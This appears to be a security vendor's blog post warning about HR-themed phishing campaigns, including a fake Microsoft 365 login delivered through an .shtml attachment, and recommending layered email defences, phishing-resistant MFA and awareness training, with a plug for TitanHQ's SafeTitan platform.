This month has seen an increase in phishing campaigns targeting professionals purporting to be messages from Human Resources advising them about salary increases, promotions, updates to policies and procedures, and other annual updates. The start of the year typically sees the HR department issue updates to employees, including notifications about changes to employee benefits, proposed pay rises, and annual updates to policies and procedures. It is therefore no surprise that cybercriminals are taking advantage of the increase in HR communications and have adopted lures related to these start-of-year messages. Several campaigns have been detected this month that have targeted employees and used HR-related lures.
The emails have realistic subject lines, appear to have been sent internally, and have lures that are likely to prompt a quick response. Messages about changes to employee benefits, pay rises, and promotions are likely to be opened by employees quickly without thinking, as are other notifications from the HR department such as updates to internal policies. Phishing simulation data shows that these types of emails have some of the highest click rates.
These emails include a combination of attachments and hyperlinks. One campaign claimed to include important information about a new benefits package and required employees to open an attached .shtml file. The email claimed employees needed to review and digitally sign the document to acknowledge receipt. In this case, opening the attached file would load a local copy of a phishing page, which generated a fake Microsoft 365 login prompt in the user’s browser. The user’s email address is populated as the username, and they are required to enter their password. The user is told that their password must be entered as they are accessing sensitive internal information.
These phishing emails may be sent from external email addresses and spoof the HR department, but internal email accounts compromised in previous phishing attacks are often used, adding to the realism of the campaign and making it harder for email security solutions to detect the emails as malicious. It is common for these campaigns to include malicious hyperlinks rather than attachments, where the user is directed to a phishing page that mimics the domain of the organization or a well-known, unrelated company. In one campaign, a healthcare organization was impersonated in an email purporting to provide details of updated medical benefits for employees. One campaign involved notifications about changes to the employee security awareness training program for the new year.
Phishing is one of the most common tactics used by cybercriminals to gain initial access to business networks. The campaigns are easy to conduct, requiring little effort by the attackers, and they are often effective. Simply opening a malicious attachment and enabling the content to view the document is all that is needed to install malware, and if a user can be convinced to disclose their Microsoft credentials, the attacker can gain access to all associated Microsoft applications, including Email, OneDrive, Teams, and SharePoint, giving them the foothold they need for conducting a more extensive attack and access to a considerable amount of sensitive company data.
Cybercriminals mimic the types of emails that employees are likely to receive at different times of the year. Over the next few weeks, it is likely that there will be an increase in phishing campaigns targeting tax professionals, and phishing campaigns targeting individuals that use tax-related lures, such as notifications about tax returns, tax rebates, and unpaid tax as tax season gets into full swing.
Businesses need to take steps to block these attacks. While antivirus software and a spam filter were once effective and could block the vast majority of email-based attacks, phishing is becoming increasingly sophisticated and the speed at which new, previously unseen malware variants can be created and released means these defenses are no longer as effective as they used to be.
To block more phishing attempts, businesses need to adopt a defense in-depth approach. In addition to antivirus/endpoint detection software and an advanced spam filter, they should consider adding a web filter to block access to the web-based component of phishing attacks and block malware downloads from the Internet. Multi-factor authentication should be implemented for accounts, although phishing kits are now being used that can bypass MFA. While any form of MFA is better than nothing, phishing-resistance MFA is ideal and should be implemented, which is based on FIDO standards and provides a much greater level of protection.
While it is the responsibility of organizations to block malicious emails and prevent them from reaching employees, it is inevitable that some will be delivered. It is therefore important to also provide security awareness training to employees to train them how to identify and avoid phishing attempts. Security awareness training combined with phishing simulations, such as those provided by TitanHQ through the SafeTitan platform, are proven to reduce susceptibility to phishing attacks.